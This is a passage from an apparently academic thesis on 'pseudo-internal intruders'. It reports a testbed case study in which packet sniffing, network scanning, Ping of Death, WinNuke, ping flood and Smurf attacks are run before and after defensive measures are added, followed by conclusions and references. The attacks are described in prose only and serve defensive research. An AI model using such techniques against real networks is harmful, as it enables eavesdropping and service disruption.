through that was not requested by an internal host. This allowed machines on the inside to communicate with the outside world, but only if the internal machine initiated the communication. In general, this is restrictive from the viewpoint of functionality (no outside accessible web pages), but is considered to be very strong network perimeter defense. This type of firewall configuration was chosen to illustrate that even the strongest network perimeter defenses have no effect on pseudo-internal intruders. The firewall will not be considered again since no pseudo-internal intruder attack will utilize the outside connect, and therefore no attack will be influenced by the presence of a firewall. Both the database and administration servers (nodes MCDS and OAS) had audit logs enabled. The audit logs recorded an entry each time a request for service or a query for information was received. Enabled audit logs represent average security practice as long as an administrator regularly reviews them. All network devices (routers and hubs) were configured in ‘out-of-box’ mode. That is, no changes were made to factory settings. Likewise, all software, including operating systems, was installed from the original retail media. That meant that no security patches or upgrades that were not shipped with the software product were installed. Although such practices are considered poor network security, one is more likely to encounter such installations rather than continuously updated software and specially configured network devices. Lastly, no internal encryption was used and no internal network intrusion detection packages were in use. The Pseudo-Internal Intruder 57 4.3 The Pseudo-Internal Intruder Attacks In order to adequately demonstrate the capabilities of a pseudo internal intruder, we defined six different attacks. At least one of each of the four types of pseudo-internal intruder attack tools and techniques (network assessment tools, packet sniffers, exploits, and denial of service attacks) was represented in the set of six attacks. Recall also that a pseudo-internal intruder requires one of two types of access: physical access to a part of the network configuration, or a rogue outside connect. The following set of attacks against the target system also included at least one attack from each form of access: 1) Packet Sniffer – Software [Laptop] 2) Network Assessment Tool – Active [Rogue Outside Connect] 3) Exploit – Ping of Death [Laptop] 4) Exploit (Hacker Program) – WinNuke (Ping of Death) [Laptop] 5) Denial of Service Attack – Ping Flood [Laptop] 6) Denial of Service Attack – Smurf Attack [Rogue Outside Connect] Attacks 1, 3, 4, and 5 were executed from a Pentium II class laptop running Windows 98. The laptop was connected to the non-mission critical half of the distributed system via an open port on hub OP (see diagram). As has been discussed, connecting the laptop to hub OP simulated a pseudo-internal intruder with physical access to at least one piece of the network configuration. Attacks 2 and 6 were executed from a remote laptop connected to node OWk3 via a modem. The unauthorized modem represents a rogue outside connect. The Pseudo-Internal Intruder 58 The first attack used a software packet sniffer from Network Associates called Sniffer Pro LAN. The goal of packet sniffing is to intercept mission critical communication and user account names and passwords. The network assessment tool used for the second attack was NetRecon by Axent Technologies. NetRecon allows the pseudo-internal intruder to direct it to actively scan a range of IP addresses or simply attempt to scan everything on the network. NetRecon provides the user with information about what operating systems nodes are running, what services are active on the nodes, and how those services are vulnerable to attack. The third attack was an exploit called the Ping of Death. It was found that sending an abnormally large ping packet to a Windows95 machine would cause the machine to either lock up or crash. When successful, such an attack eliminates the functionality of a Windows 95 machine until the machine is rebooted. Microsoft released a security patch for Windows 95 that prevented this problem from occurring, but many machines have never had the security patch installed. Unless the owner of a machine specifically downloaded and installed the security patch, then their Windows 95 machine is susceptible to the Ping of Death attack. The fourth attack was the same as the third, except that a hacker program called WinNuke was utilized by the pseudo-internal intruder. WinNuke is a program that runs on Windows 95 or 98 machines and executes a Ping of Death attack against any number of machines as directed by the user. The fifth attack was a denial of service attack called a ping flood. A ping flood is an attack where the pseudo-internal intruder directs the laptop to continuously send ping packets to a target machine at a high rate of speed. This attack effectively cuts off the The Pseudo-Internal Intruder 59 target machine from the network. The target machine is receiving so many ping packets that it cannot respond to any other request for service. Even when the machine is able to respond to a request for service, it is likely that the pathways of network communication are clogged with the ping packets thereby making communication with any other machine difficult. The last attack is a different kind of denial of service attack called a Smurf attack. In a Smurf attack, the pseudo-internal intruder directs a machine to send a ping packet to multiple machines. The ping packet is constructed to appear as if it came from some target machine. Therefore, all of the machines that receive the ping packet respond by sending a packet to the target machine, and not the pseudo-internal intruder’s machine. In this way, the target machine is overwhelmed in a manner similar to the above ping flood. This attack has the advantage of being indirect (the ping flood is not coming from the pseudo-internal intruder’s machine). The attack is shorter in duration unless the attack machine continues to send the bogus ping packets to multiple machines. 4.4 Expected Results Two results were recorded for each pseudo-internal intruder attack The first result was the success of the particular attack. Each attack had a stated goal, and the success of an attack was determined by comparing the result with the goal. The second recorded result was the ability of the distributed system to detect the attack, even if the attack succeeded. The ability of the distributed system to detect an attack was judged by examining the footprint of the attack and any security measures in place to examine The Pseudo-Internal Intruder 60 footprints. A footprint is any observable change in the network configuration of a distributed system. Results of Attacks on Target System – Phase 1 4.5 The following section will discuss the results of executing the set of attacks against the Phase 1 target system. 1) Packet Sniffer – Software [Laptop] - Result: The packet sniffer successfully captured the exchange of the mission critical text file and user names and passwords between nodes OAS and MCDS and nodes MCDS and MCDW. In any network each packet first goes to the gateway machine. The gateway decides whether the packet is for an external machine or an internal machine. If the packet is for an internal machine, the gateway broadcasts that packet back toward the network. In an unsegmented network the packet is broadcast to every machine. Any machine that is not the intended recipient of the packet simply ignores it, unless the machine is running a packet sniffer which records all packets. The packet sniffer even captures the packets between nodes on a different hub since each packet goes out to the gateway (which is also the firewall in this case) and then back to all devices (since there is no segmenting). The packet sniffer also captured the external POP Mail server account name and password of the user of node OWk2. - Footprint: The footprint for this attack is small. The only changes made to the network configuration by the packet sniffer were an additional port in use on hub OP (laptop plugged in to it) and an additional MAC and IP address in use on the The Pseudo-Internal Intruder 61 network. Without special configuration (not in use in this case), the laptop will answer any MAC address or IP address scan and would show up on a Network Assessment scan. That is, if the laptop receives any request to report its IP or MAC address, it will respond with the addresses it is using. But, in the first phase of the case study, none of these things are being monitored. Therefore, the footprint of this first attack is not observable without further security changes to the system. 2) Network Assessment Tool – Active [Rogue Outside Connect] - Result: The active network assessment, via the modem line, succeeded in gaining information on all nodes on the network, including what operating system was running and what services were active. The scan reported that node MCDW was a Windows 95 machine vulnerable to a Ping of Death attack. There were a few added obstacles that the pseudo-internal intruder had to surmount to achieve the successful scan. The user of node OWk3 that set up the modem has the option of requiring a password to remotely connect to node OWk3. The pseudo-internal intruder would have to obtain such a password to connect to node OWk3. Just as physical security was ignored for the purposes of the case study, this issue was also not considered, but it should be noted. - Footprint: The nature of the rogue outside connect required that the assessment tool be run in active mode. The Point to Point Protocol connection between the remote intruder and node OWk3 did not allow the intruder’s computer to passively “listen” to communication over the network. The intruder’s computer The Pseudo-Internal Intruder 62 must actively request information by sending a packet to a host that requires a response. Therefore, the footprint of this attack is larger than that of the packet sniffer. While the modem connection does not require an additional IP or MAC address to be assigned to the remote laptop, the active actions create traffic coming from node OWk3. So any machine with audit logs enabled will record that node OWk3 (the machine with the modem) was requesting information about what services were running on the server. Any review of the audit logs would reveal suspicious activity and likely result in the discovery of the unauthorized modem. Therefore, the intruder would have to follow up the active assessment with another activity since discovery is highly likely. 3) Exploit – Ping of Death [Laptop] - Result: The pseudo internal intruder was successful in locking up node MCDW by sending an abnormal size ping packet (Ping of Death attack) from the laptop on hub OP to node MCDW on hub MC. The workstation locked up and had to be rebooted. There was no warning as to why workstation locked up. Any unsaved work was lost and the functionality of the machine was eliminated until it was rebooted. - Footprint: The footprint for this attack is only slightly larger than the footprint for attack 1. Other than the existence of laptop issues discussed above, the only additional change in the network configuration is the presence of the abnormal size packet. Although there are servers with audit logs enabled that do receive the abnormal size ping packet (since all machines receive every packet), the servers The Pseudo-Internal Intruder 63 do not record the event since the packet is not intended for that machine. There are no other security measures in place in phase 1 to detect the Ping of Death attack. 4) Exploit (Hacker Program) – WinNuke (Ping of Death) [Laptop] - Result: Attack 4 was as successful as attack 3. In fact, the results were exactly the same. The only difference between the two attacks is that a windows program was used to launch the attack from the laptop instead of using the ping command. - Footprint: The footprint for this attack was no different than that of attack 3. The use of the program WinNuke instead of manually sending the abnormal size ping packet makes no difference with respect to the network configuration. 5) Denial of Service Attack – Ping Flood [Laptop] - Result: The pseudo-internal intruder laptop on hub OP sent continuous ping packets to node MCDS on hub MC. Nodes OAS and MCDW were observed to no longer be able to reliably communicate with node MCDS because node MCDS was too busy answering the pings from the laptop (intermittent communication was possible). The ability of any nodes to communicate with any other node was degraded due to the numerous ping packets saturating the entire network as each ping packet is first sent to the gateway and then to every node on the network. - Footprint: The footprint of attack 5 is similar to that of attacks 3 and 4. The existence of the laptop on the network creates unauthorized MAC and IP address The Pseudo-Internal Intruder 64 usage. Likewise, there are servers (node OAS) with audit logs enabled that see the ping packets, but do not record them since the pings are intended for another machine. Node MCDS audit logs would also show all of the incoming ping packets. The footprint was, however, more noticeable by all users of the network because of the “sluggishness” created by the saturation of the network by ping packets. There is no security tool in use for phase 1 of the case study that would indicate a ping flood attack in progress, but it is likely that system administrators would quickly realize there was something wrong with the network and investigate further. 6) Denial of Service Attack – Smurf Attack [Rogue Outside Connect] - Result: The results of this attack are similar to those of attack 5. Reliable communication between node MCDS and any other node was not possible. Communication for any node was degraded due to the saturation of the network by ping packets. The difference between attacks 5 and 6 was the way in which the attack was launched. Attack 6 was launched from the remote laptop connected to node OWk3 via a modem. The pseudo-internal intruder remote laptop sent ping packets to several other nodes. The ping packet was constructed to appear as if node MCDS had sent it. Therefore, all of the nodes replied to node MCDS. This process was repeated to create a continuous flow of ping packets directed at node MCDS. - Footprint: Attack 6 has a larger footprint than the other attacks because several nodes are receiving ping packets directed at them from node MCDS. Thus, The Pseudo-Internal Intruder 65 servers with audit logs would record the numerous requests to respond to node MCDS. As in attack 5, all users of the network would notice that the network was “sluggish” and unresponsive. It would certainly be noticeable by observing the audit logs of node MCDS that would show a large amount of pings. 4.6 Security Changes Made to Testbed System for Phase 2 In order to demonstrate the effectiveness of the security measures proposed by this thesis, the following security changes were made to the testbed distributed system prior to phase 2 of the case study. These changes are those advocated to mitigate the consequences of a pseudo-internal intruder gaining access to a target system and detecting, monitoring, and recording any intrusions. Specifically, the following suggestions are steps to increase network configuration control and network configuration monitoring. Denying the intruder access to the distributed system (physical perimeter defense and physical configuration control) were not considered for the case study. To limit the unintended recipients of a given packet, the testbed distributed system was divided into two segments. The first segment contained those nodes connected to hub OP. That segment represents the operation segment. The second segment contained those connected to hub MC. The second segment represents the mission critical segment. Any packet transmitted from the gateway (the firewall in this case) was only transmitted to nodes in the segment that contained the recipient of the packet. Also, in an effort to limit the unintended recipients of any mission critical packet, The Pseudo-Internal Intruder 66 all mission critical communication was encrypted. Likewise, all nodes were required to use secure (encrypted) telnet and secure file transfer protocol. A network intrusion detection monitoring device was inserted between the router and hub MC to monitor and protect the mission critical segment. The device was actually a router that contained a computer running Internet Secure Systems’ (ISS) RealSecure monitoring product. The network intrusion detection monitoring device was made by ODS Networks Inc. [ODS97, ODS98]. Each packet that passes through the network intrusion monitoring device was examined by the ISS RealSecure software. Each packet was compared to a list of packets used to execute many known attacks. For example, if a packet matched an oversized Ping of Death packet, then the packet would be discarded and not allowed to pass through to the segment protected by the intrusion detection monitoring device. The software also checks for attack patterns using multiple packets. For example, the software will allow several consecutive ping packets for a single machine to pass through, but too many consecutive ping packets would indicate a ping flood attack and such packets would be blocked from passing the intrusion detection monitoring device. Any suspicious packet activity found by the software is reported to the system administrator via e-mail. If the system is unable to send e-mail, it dials the system administrator’s digital pager using a modem connected to an outside phone line (out-of-band). In an effort to increase network configuration monitoring, each segment has one server that continuously scans for unauthorized MAC and IP address activity. A full network assessment utility is periodically run as well to search for unknown and unauthorized nodes. Likewise, an RMON (Remote Monitoring) compliant network The Pseudo-Internal Intruder 67 device monitoring utility is used on each segment. RMON is a protocol that that communicates remote network management information over the network. The monitoring device queries the network device for information like which ports are in use, what MAC addresses are using which port, and how much traffic is going through the network device. Some RMON compliant software can even analyze this data for trends or be configured to automatically notify the administrator when certain ports are in use or when the overall network traffic reaches some level. Figure 4-2: Network Configuration of Phase 2 Testbed System The Pseudo-Internal Intruder 68 Results of Attacks on Target System – Phase 2 4.7 The following section will discuss the results of executing the set of attacks against the phase 2 target system. 1) Packet Sniffer – Software [Laptop] - Result: The packet sniffer was only able to capture the external POP Mail server account name and password of the user of node OWk2. Since all communication between mission critical nodes was encrypted, the packets containing the mission critical text file and user account names and passwords were unreadable. Even if communications between nodes MCDS and MCDW were not encrypted, the sniffer would not capture them since packets not intended for nodes on segment 1 are not transmitted to segment 1 (where the laptop is connected). - Footprint: While the footprint is no different than it was in the first phase of the case study, there were more security measures in place to detect such footprints. The network administration server on the same segment as the laptop reported an unidentified MAC address and IP address in use (the laptop). The periodic active network assessment from node OAS also detected the laptop and reported on the operating system and services it was running. From that information, the system administrator on node OAS could conclude that there was an unidentified machine in use on the segment. Furthermore, RMON compliant monitoring software reported that an additional port on hub OP was in use. In this way the system administrator could determine the physical location of the unauthorized node visible on the network (by tracing the wiring from the unauthorized port on The Pseudo-Internal Intruder 69 hub OP). This was true for all attacks using the laptop, so it will not again be mentioned in detail. 2) Network Assessment Tool – Active [Rogue Outside Connect] - Result: In most segmenting schemes, system administrators use different ranges of IP addresses for different segments on the network. Without knowing the IP address scheme, a machine on one segment cannot send packets to a machine on another segment. For this reason, the active network assessment tool was only able to gain information about the nodes on the same segment as node OWk3. Without knowledge of the IP addresses of nodes MCDS and MCDW (segment 2 nodes), there was no way to gain information about those nodes. Therefore, the pseudo-internal intruder using the rogue outside connect had no way of knowing what operating systems were in use by segment 2 (Mission Critical) nodes, and what vulnerabilities segment 2 nodes might have. The active assessment still gained the same information as in the first phase of the case study about the nodes on segment 1 (Operational). Furthermore, the network intrusion detection monitoring device can be configured to deny some of the packets that contain request for information used by active network assessment tools. - Footprint: As in the first phase of the case study, the audit logs active on node OAS recorded the activities of the network assessment tool. As before, further investigation as to why node OWk3 was requesting information from other machines would lead the system administrator to discover the unauthorized modem. The Pseudo-Internal Intruder 70 3) Exploit – Ping of Death [Laptop] - Result: This attack was totally unsuccessful in phase 2 of the case study. The abnormal size ping packet sent from the laptop was stopped by the network intrusion detection monitoring device protecting the mission critical segment of hub MC. The device immediately reported, via e-mail to the system administrator, that a Ping of Death attack had been attempted against node MCDW. Node MCDW was never affected. - Footprint: Like the other attacks, the footprint of attack 3 was no different in phase 2 of the case study. The difference is that measures had been put in place to detect attack footprints. The network intrusion detection monitoring device immediately reported the attack to the system administrator and narrowed the source of the attack to the operational segment. The system administrator at node OAS would then be able to employee the methods discussed in attack 1 to quickly locate the unauthorized laptop. 4) Exploit (Hacker Program) – WinNuke (Ping of Death) [Laptop] - Result: The results were the same as those of attack 3. - Footprint: The footprint and the system’s ability to detect the footprint were the same as in attack 3. 5) Denial of Service Attack – Ping Flood [Laptop] The Pseudo-Internal Intruder 71 - Result: Attack 5 was partially successful. When the pseudo-internal intruder using the laptop attempted to ping flood node MCDS, the network intrusion detection monitoring device stopped the flood of ping packets from reaching any node on segment 2. Because of the segmenting of the network, the ability of nodes to communicate with each other was not degraded as badly as in phase 1. The ping packets are not rebroadcast by the gateway to all nodes on the network. Consequently, the only interference is from the original ping packets from the laptop to node MCDS. These ping packets were numerous enough to somewhat degrade the operational segment nodes’ ability to communicate over the network. The network intrusion detection monitoring device notified the system administrator via an out-of-band page. Since the network intrusion detection monitoring device is also a router, packets from node MCDS to node MCDW were sent to the router and then back to node MCDW. These packets did not have to go to the gateway since the router recognized the recipient as a mission critical segment node and directed the packets back to MCDW. The attack did not degrade the ability of mission critical segment nodes to communicate with each other. - Footprint: Once again, the footprint of attack 5 was the same as in phase 1, but the network intrusion detection monitoring device recognized the ping flood and reported the attack to the system administrator. As in the above attacks, the administrator was able to locate the unauthorized laptop. 6) Denial of Service Attack – Smurf Attack [Rogue Outside Connect] The Pseudo-Internal Intruder 72 - Result: The results of attack 6 were similar to those of attack 5. The first several pings from nodes on segment 1 were allowed through to node MCDS, but the network intrusion detection monitoring device prevented a large number of the pings through as soon as it recognized a Smurf ping flood attack. Additionally, attempts to use any node on segment 2 as a Smurf relay (the node sending out a ping to the target) failed because the network intrusion detection monitoring device stopped all attempts to use those machines as Smurf relays. These incidents were reported to the system administrator immediately. - Footprint: The footprint was the same as in phase 1, but like the previous attacks, the system administrator was able to use the information sent by the network intrusion detection monitoring device to locate the unauthorized laptop. 4.8 Summary Although not a large, real world distributed system, the testbed system was sufficient to illustrate the differences between state of practice and state of art security measures with respect to pseudo-internal intruders. The hardware that comprised the testbed system was diverse enough to be representative of the types of devices and machines found in a majority of distributed systems. The scalability of the testbed system, the fact that the testbed system could be the backbone of a thousand node system, made the testbed system representative of large real world distributed systems. The results of the first phase of the case study showed many of the network related vulnerabilities still present in a distributed system with state of practice security measures. State of practice security often does not provide internal access control for The Pseudo-Internal Intruder 73 users of the network. While security measures are in place to prevent unauthorized external access to the network, anyone inside the network perimeter can connect a device to the network with little difficulty. Nor did the testbed system have any network traffic control mechanisms. At no point inside the network perimeter was network traffic examined for authenticity (from a legitimate internal node) or danger to the network (Ping of Death packet, etc.). Lastly, state of practice security makes little effort to monitor the internal network for intruders. Such state of practice security depends upon network perimeter defenses to keep intruders out of the system and host based internal intruder detection packages to detect unauthorized actions by users. After executing the set of pseudo-internal intruder attacks, it was apparent that a pseudo-internal intruder can do great damage by exploiting the vulnerabilities found in a distributed system with only state of practice security. For the second phase, the security recommendations for combating the pseudointernal intruder were implemented prior to executing the set of attacks. Comparing the results of the attacks from the two phases, it is apparent that network configuration control and network configuration monitoring help mitigate the threat of the pseudointernal intruder. For each attack, the success of the attack decreased and the ability of the system administrator to detect the footprint increased in phase 2. Network configuration control measures make it more difficult for pseudointernal intruders to access the system. Such measures also decrease the ability of pseudo-internal intruders who do gain access to the system to gather information or do harm to the distributed system. Network configuration monitoring mitigates the danger of pseudo-internal intruders by promptly notifying the system administrator of intruders. The Pseudo-Internal Intruder 74 The results of the case study make it clear that through network configuration control and network configuration monitoring, system administrators can greatly decrease the possibility of and the danger of the pseudo-internal intruder. The Pseudo-Internal Intruder 75 Chapter 5: Conclusions and Future Work 5.1 Conclusions This thesis has defined a new access oriented intruder category: the pseudo- internal intruder. We have defined the pseudo-internal intruder as a new distinct category, as opposed to a subcategory, after examining it with respect to internal and external intruders in modern distributed systems. We have examined the tools and techniques usable by the pseudo-internal intruder as well as the danger such an intruder represents to a distributed system. Finally, we discussed an overall strategy for defending a distributed system against a pseudo-internal intruder and offered a case study as an example of how that defensive strategy can be implemented. It is clear that others in the intrusion detection field are concerned about internal network based attacks. Some intrusion detection system developers have started to address the question of network intrusions. There are several network intrusion detection systems that address the issue of intrusions via the internal network of a distributed system, as opposed to external intrusion attempts or user account misuse. NetSTAT, an extension of the State Transition Analysis Technique (STAT), was created because developers realized that network attacks “may be totally invisible from the audit trail (traditional intrusion detection) produced by the attacked host” [STA99]. Instead of focusing on nodes, NetSTAT used the “the network and its protocols” (network configuration) as its source of security related information [KV98]. Likewise, the ODS router and RealSecure software package used in the case study provides a network oriented intrusion detection system [ODS98]. There are currently multiple network intrusion detection efforts underway including [HF98] and [MHL94], among others. The Pseudo-Internal Intruder 76 While some of these network intrusion detection systems offer very promising results, few of the efforts made an attempt to formally define the scope of the network based intrusion problem. The existence of these ‘new’ efforts indicates an acceptance of a ‘new’ intruder problem. Any definition of this ‘new’ intruder problem will aid developers in efficiently and effectively addressing the problem. The pseudo-internal intruder category addresses an area of potential intrusions that did not exist prior to the proliferation of the networked distributed system. The pseudo-internal intruder category provides intrusion detection developers a platform on which to understand and define the capabilities of the pseudo-internal intruder, thereby facilitating the detection and defense against such intruders. 5.3 Future Work When Anderson defined the internal and external categories the principle defining aspect of intruder threats was whether the intruder was “authorized to use the computer system” [And80]. This thesis has argued that an additional defining aspect of intruder threat is whether the intruder has direct access to the internal network of a system. This additional defining aspect came into existence because of changing technology since the early 1980s. Therefore, it is possible that technology yet to be developed or yet to become mainstream will force a reexamination of the defining aspects of intruder threats. Such developing technology could force the further refinement of intruder categorization, resulting in more than three access oriented intruder categories. The Pseudo-Internal Intruder 77 References [AFV95] Anderson, Debra, Than Frivold, and Alfonso Valdes. “Next Generation Intrusion Detection Expert System (NIDES): A Summary.” SRI International. May 1995. [AKS96] Aslam, Taimur, Ivan Krsul, and Eugene H. Spafford. “Use of A Taxonomy of Security Faults.” Purdue University Technical Report,TR96-051. September 1996. [AN96] Abadi, Martin, and Roger Needham. “Prudent Engineering Practice for Cryptographic Protocols.” IEEE Transations on Software Engineering, 22 (1). January 1996. 6-15. [And80] Anderson, James P. “Computer Security Threat Monitoring and Surveillance.” James P. Anderson Co. February 1980. [And85] Anderson, James P. “A Unification of Computer and Network Security Concepts.” IEEE Proceedings of the 1985 Symposium on Security and Privacy. April 1985. 77-87. [And93] Anderson, Ross. “Why Cryptosystems Fail.” 1st ACM Conference on Computer and Communications Security. 1993. [Bar98] Barnes, Bruce H. “Computer Security Research: A British Perspective.” IEEE Software. IEEE Computer Society. September/October 1998. 3033. [Bou98] Boulander, A. “Catapults and Grappling Hooks: The Tools and Techniques of Information Warfare.” IBM Systems Journal, 37(1). 1998. 106-114. The Pseudo-Internal Intruder 78 [CH96] Cannady, J. and J. Harrell. “A Comparative Analysis of Current Intrusion Detection Technologies.” 4th Technology for Information Security Conference. May 1996. [CER94] 1994 CERT Coordination Center Annual Report. http://www.cert.org/annual_rpts/cert_rpt_94.html [CER98] 1998 CERT Coordination Center Annual Report. http://www.cert.org/annual_rpts/cert_rpt_98.html [CNE96] “Ping of Death Averted.” CNET News.com. November 25, 1996. [CNN99] “E-mail Virus Threatens.” Cable News Network. March 29, 1999. [Den83] Denning, Dorothy E. “Protecting Public Keys and Signature Keys.” Computer. IEEE Computer Society. February 1983. 27-35. [Den87] Denning, Dorothy E. “An Intrusion-Detection Model.” IEEE Transations on Software Engineering, SE-13(2). February 1987. 222-232. [Den99] Denning, Dorothy E. Information Warfare and Security. AddisonWesley. 1999. [DM98] Dowd, Patrick W. and John T. Henry. “Network Security: It’s Time to Take It Seriously.” Computer. IEEE Computer Society. September 1998. 24-28. [DV97] Davis, B. and B. Violino. “Security: Window of Vulnerability.” Information Week. March 10, 1997. The Pseudo-Internal Intruder 79 [Eck85] Eck, Wim van. “Electromagnetic Radiation from Video Display Units: An Eavesdropping Risk?” Computers & Security 4. Elsevier Science Publishers B.V. 1985. 269-286. [FOL99] Free On-Line Dictionary of Computing. 1999. Http://wombat.doc.ic.ac.uk/foldoc/index.html [GAO96] “Information Security: Computer Attacks at Department of Defense Pose Increasing Risks.” General Accounting Office Chapter Report, AIMD-9684. May 1996. [Gri95] Griffiths, B. “Optical Fibre Security Systems: Applications for Intrusion Detection.” Glass Technology, 36(5). October 1995. 150-152. [HF98] Hofmeyr, Steven A. and Stephanie Forrest. “Immunizing Computer Networks: Getting All the Machines in Your Network to Fight the Hacker Disease.” Submitted to: 1999 IEEE Symposium on Security and Privacy. November 1998. [ISV95] Icove, David, Karl Seger, and William VonStorch. Computer Crime: A Crimefighter’s Handbook. O’Reilly & Associates. 1995. [IKP95] Ilgun, Koral, Richard A. Kemmerer, and Phillip A. Porras. “State Transition Analysis: A Rule-Based Intrusion Detection Approach.” IEEE Transations on Software Engineering, 21(3). March 1995. 181-199. [JS99] Jones, Anita, and Robert Sielken. “Intrusion Detection.” University of Virginia Technical Report. May 1999. The Pseudo-Internal Intruder 80 [KV98] Kemmerer, R. and G. Vigna, "NetSTAT: A network-based intrusion detection approach," Proceedings of the 14th Annual Computer Security Applications Conference. December 1998. [Kor97] Kornblum, Janet. “Microsoft Posts Another Bug Fix.” CNET News.com. July 1, 1997. [LG97] Landwehr, Carl E. and David M. Goldschlag. “Security Issues in Networks with Internet Access.” Proceedings of the IEEE, 85(12). December 1997. 2034-2051. [LS90] Lu, Wen-Pai, and Malur K. Sundareshan. “A Model for Multilevel Security in Computer Networks.” IEEE Transations on Software Engineering, 16(6). June 1990. 647-659. [Lun93] Lunt, T.F. “A survey of Intrusion Detection Techniques.” Computer & Security 12. 1993. 405-418. [Mei99] Meier, Garry. “Off the Record: A Survey of Top INFOSEC Execs in Banking.” Electronic Trust: The Magazine of Information Security Trends. Q1, 1999. [MHL94] Mukherjee, B., L. T. Heberlein, and K. N. Levitt. “Network Intrusion Detection.” IEEE Network. May/June 1994. 26-41. [Nes87] Nessett, Dan M. “Factors Affecting Distributed System Security.” IEEE Transations on Software Engineering, SE-13(2). February 1987. 233248. The Pseudo-Internal Intruder 81 [Neu98] Neumann, Peter G. “Security, Survivability, Risks, etc.” Invited Lecturer. Department of Computer Science, University of Virginia. November 19, 1998. [ODS97] “Leading Security Companies Partner to Deliver New Class of Network Security Service.” ODS Networks Press Release. September 30, 1997. [ODS98] “Evaluating Your Network’s Security.” ODS Networks. April 1998. Http://www.ods.com/white/whi_0004.shtml [PCO97] Puketza, Nicholas, Mandy Chung, and Ronald A. Olsson. “A Software Platform for Testing Intrusion Detection Systems.” IEEE Software. September/October 1997. 43-50. [Pow99] Power, Richard. “1999 CSI/FBI Computer Crime and Security Survey.” Computer Security Journal, XV(2). 29-45. [PZ+96] Puketza, Nicholas, Kui Zhang, Mandy Chung, Biswanath Mukherjee, and Ronald A. Olsson. “A Methodology for Testing Intrusion Detection Systems. IEEE Transations on Software Engineering, 22(10). October 1996. 719-729. [Reu98a] “China Foils Cyber Bank Robbers.” Reuters Limited. October 22, 1998. [Reu98b] “Chinese Crackers Get Death.” Reuters Limited. December 28, 1998. [Sch96] Schneier, Bruce. Applied Cryptography, Second Edition. John Wiley & Sons Inc. 1996. The Pseudo-Internal Intruder 82 [Sel90] Seline, Christopher. “Eavesdropping on the Electromagnetic Emanations of Digital Equipment: The Law of Canada, England, and the United States.” June 1990. [Spa96] Spafford, Eugene H. Security Seminar. Department of Computer Science, Purdue University. January 1996. [SRI97] “What is NIDES?” SRI International / Computer Science Laboratory. Http://www.csl.sri.com/nides/index1.html [STA99] “Projects: The STAT Approach.” Reliable Software Group at University of California at Santa Barbara. Http://www.cs.ucsb.edu/~kemm/netstat.html/projects.html [Sun96] Sundaram, Aurobindo. “An Introduction to Intrusion Detection.” ACM Crossroads, 2(4). 1996. [Tan96] Tanenbaum, Andrew S. Computer Networks, Third Edition. Prentice Hall. 1996. [Win97] Wingfield, Nick. “Hole in Windows 95, NT fixed.” CNET News.com. May 12, 1997. The Pseudo-Internal Intruder
